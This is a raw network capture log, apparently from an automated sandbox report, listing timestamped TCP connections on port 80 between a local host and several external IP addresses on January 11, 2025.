                                                                                                                                                                              Jan 11, 2025 03:58:09.174531937 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.345926046 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.346298933 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.351660967 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:09.523060083 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523541927 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523552895 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523560047 CET804979974.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:09.523718119 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:10.853116989 CET4979980192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:11.869245052 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.040469885 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.040740013 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.044322968 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.215655088 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216336012 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216372967 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216399908 CET804980074.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:12.216536999 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:12.216578960 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:13.555643082 CET4980080192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.571835041 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.743038893 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.743304968 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.746936083 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.746969938 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.747036934 CET4980180192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:14.918385029 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918526888 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918548107 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918975115 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.918992043 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.919003010 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:14.919136047 CET804980174.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.274321079 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.445897102 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.446074009 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.448467016 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.619719982 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620135069 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620177984 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620209932 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:17.620503902 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.621155024 CET4980280192.168.11.2074.48.143.82
                                                                                                                                                                              Jan 11, 2025 03:58:17.792496920 CET804980274.48.143.82192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.095151901 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.319633007 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.319838047 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.323421001 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.546035051 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737550974 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737627983 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737677097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737732887 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737782955 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.737849951 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.737914085 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738063097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738136053 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738178968 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738277912 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738385916 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.738400936 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738449097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.738693953 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.960829973 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.960913897 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.960958004 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961019993 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961080074 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961215019 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961289883 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961364985 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961406946 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961544037 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961553097 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961664915 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961734056 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961781025 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961894035 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.961961985 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.961994886 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962116957 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962178946 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962292910 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962341070 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962461948 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962527037 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962591887 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962666988 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962687016 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962806940 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.962865114 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:23.962924004 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:23.963115931 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184048891 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184082031 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184225082 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184251070 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184348106 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184497118 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:24.184593916 CET4980380192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:24.184606075 CET8049803134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708225012 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708297968 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708339930 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708472967 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708481073 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708517075 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708547115 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708697081 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708734989 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.708808899 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708914995 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.708997011 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709079027 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709141016 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709261894 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709264994 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709477901 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709522963 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709599018 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709641933 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709810019 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.709845066 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:29.709847927 CET8049805134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:29.710099936 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:30.333280087 CET4980580192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.349498034 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.572200060 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.572381020 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.574815989 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.797348976 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.954672098 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.954969883 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:31.955137014 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:31.955806017 CET4980680192.168.11.20134.0.14.158
                                                                                                                                                                              Jan 11, 2025 03:58:32.178188086 CET8049806134.0.14.158192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.301539898 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.439331055 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.439640999 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.443126917 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:38.580456972 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.580468893 CET804980713.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:38.580625057 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:39.956140041 CET4980780192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:40.972269058 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:41.986325979 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.122028112 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.122250080 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.125760078 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:42.261383057 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.261393070 CET804980813.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:42.261542082 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:43.627271891 CET4980880192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:44.643367052 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.657409906 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.794184923 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:45.794353008 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.797969103 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.797992945 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.934653044 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:45.934839010 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.934866905 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:45.935010910 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:45.979006052 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071504116 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071754932 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071763992 CET804980913.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:46.071906090 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:47.313884020 CET4980980192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:48.330075979 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.344022036 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.480846882 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:49.480989933 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.483393908 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:49.663857937 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627265930 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627276897 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:50.627513885 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:50.628190041 CET4981080192.168.11.2013.248.169.48
                                                                                                                                                                              Jan 11, 2025 03:58:50.764688969 CET804981013.248.169.48192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:58:59.650211096 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.007869005 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.008147955 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.010648966 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.367993116 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368762016 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368792057 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.368814945 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:00.369045019 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.369837046 CET4981180192.168.11.20202.92.5.23
                                                                                                                                                                              Jan 11, 2025 03:59:00.727185965 CET8049811202.92.5.23192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:05.373270035 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:06.387248993 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.402489901 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.538321972 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.538547993 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.542073965 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:08.677784920 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.677881956 CET804981276.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:08.678067923 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:10.043381929 CET4981280192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.059401035 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.195832014 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.195981026 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.199618101 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:11.335268021 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.335283041 CET804981376.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:11.335536003 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:12.714553118 CET4981380192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.730827093 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.869432926 CET804981476.223.54.146192.168.11.20
                                                                                                                                                                              Jan 11, 2025 03:59:13.869720936 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873342991 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873366117 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 03:59:13.873442888 CET4981480192.168.11.2076.223.54.146
                                                                                                                                                                              Jan 11, 2025 04:00:11.695389032 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:11.864563942 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:11.864739895 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:11.868295908 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:12.052470922 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:12.052480936 CET8049838103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:12.052650928 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:13.373775005 CET4983880192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.380268097 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.549413919 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.549664021 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553235054 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553253889 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.553335905 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:14.724086046 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729598045 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729613066 CET8049839103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:14.729798079 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:16.062685013 CET4983980192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.075417042 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.244910955 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.245122910 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.247589111 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.433700085 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.433710098 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.433825016 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:00:17.434037924 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.434037924 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.434662104 CET4984080192.168.11.20103.224.182.242
                                                                                                                                                                              Jan 11, 2025 04:00:17.603816032 CET8049840103.224.182.242192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.155370951 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.458719015 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.458843946 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.462804079 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:55.768196106 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768549919 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768594027 CET8049848101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:55.768799067 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:56.964334965 CET4984880192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:57.977950096 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.280364037 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.280540943 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.284071922 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:58.586396933 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.586853027 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.587014914 CET8049849101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:01:58.587137938 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:01:59.794018030 CET4984980192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:00.800230980 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.121746063 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.121938944 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.125547886 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.125627041 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:01.446916103 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447159052 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447169065 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447448969 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447458982 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447630882 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447875023 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.447990894 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.448000908 CET8049850101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:01.448164940 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:02.634876013 CET4985080192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.645250082 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.965598106 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:03.965742111 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:03.968141079 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.288678885 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.288980007 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.289024115 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:04.289280891 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.289994955 CET4985180192.168.11.20101.35.209.183
                                                                                                                                                                              Jan 11, 2025 04:02:04.612097979 CET8049851101.35.209.183192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.291565895 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:09.596366882 CET8049852154.23.178.231192.168.11.20
                                                                                                                                                                              Jan 11, 2025 04:02:09.596539021 CET4985280192.168.11.20154.23.178.231
                                                                                                                                                                              Jan 11, 2025 04:02:09.600085020 CET4985280192.168.11.20154.23.178.231
